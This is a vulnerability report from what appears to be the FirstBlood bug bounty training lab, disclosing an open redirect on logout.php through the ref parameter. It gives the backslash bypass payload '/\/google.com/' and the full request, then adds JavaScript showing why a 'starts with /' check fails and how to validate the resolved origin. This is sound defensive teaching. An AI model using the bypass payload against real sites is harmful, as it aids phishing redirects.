FirstBlood-#259 — CWE-601 Open Redirect on GET /drpanel/logout.php via ref param
This issue was discovered on FirstBlood v1
On 2021-05-15, jpdev Level 3 reported:
Summary
The ref= parameter on the logout.php page within the drpanel is vulnerable to an open redirect.
Payload
/\/google.com/
Request
GET /drpanel/logout.php?ref=/\/google.com/ HTTP/1.1
Host: firstbloodhackers.com:49723
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49723/drpanel/index.php
Cookie: drps=1ef2ec2643929e919611d0031
Upgrade-Insecure-Requests: 1
Impact
A web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
Additional Reading containing explanation and mitigations
https://www.bugbountyhunter.com/vulnerability/?type=open_redirect
https://cwe.mitre.org/data/definitions/601.html
https://www.hacksplaining.com/prevention/open-redirects
P4 Low
Endpoint: GET /drpanel/logout.php?
Parameter: ref=
Payload: /\/google.com/
FirstBlood ID: 1
Vulnerability Type: Open Redirect
There is an open URL redirect vulnerability on /logout.php. The code expects the ref value to start with / and is meant not to redirect to external domains, but this can be bypassed: browsers parse the backslash in /\/google.com/ as a forward slash, so the value is treated as the protocol-relative URL //google.com/ and the user is sent off-site.
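The parser differential behind this bypass, shown as an added example (this is not FirstBlood's code, and the real logout.php is not on the page). The naive check reconstructs the described behaviour ("must start with /"), browserTarget resolves the ref the way a WHATWG-compliant browser does after a Location header (Node's URL class implements the same spec), and safeIsLocal is a hardened replacement. The site origin is taken from the report's Host header; the function names are assumptions made here.

```javascript
// Added example, not FirstBlood's code. Demonstrates why a "starts with '/'"
// check on ref= is bypassable and how to validate the redirect target instead.
// Origin taken from the Host header in the report.
const SITE = "http://firstbloodhackers.com:49723";

// Reconstruction (assumption) of the check described in the disclosure:
// accept anything beginning with a single slash as "local".
function naiveIsLocal(ref) {
  return typeof ref === "string" && ref.startsWith("/") && !ref.startsWith("//");
}

// Where a browser actually goes after `Location: <ref>` from logout.php.
// WHATWG URL parsing treats '\' like '/' for http(s), so "/\/google.com/"
// becomes the scheme-relative "//google.com/" and leaves the site.
function browserTarget(ref) {
  return new URL(ref, SITE + "/drpanel/logout.php").href;
}

// Hardened check: reject characters that make server-side string checks and
// the browser disagree (backslash, userinfo '@', leading '//'), then resolve
// with the same parser the browser uses and require the origin to match.
function safeIsLocal(ref) {
  if (typeof ref !== "string" || !ref.startsWith("/")) return false;
  if (/[\\@]|^\/\//.test(ref)) return false;
  let target;
  try {
    target = new URL(ref, SITE + "/");
  } catch {
    return false;
  }
  return target.origin === SITE;
}

// Demonstration with the payload from the report and a legitimate path.
for (const ref of ["/\\/google.com/", "//google.com/", "/drpanel/index.php"]) {
  console.log(ref, "naive:", naiveIsLocal(ref), "safe:", safeIsLocal(ref),
              "browser goes to:", browserTarget(ref));
}
```

The important design point is to validate the resolved URL's origin, not the raw string: any check that reasons about the first few characters is fighting the browser's own normalisation rules, and the backslash trick is only one of several such differences.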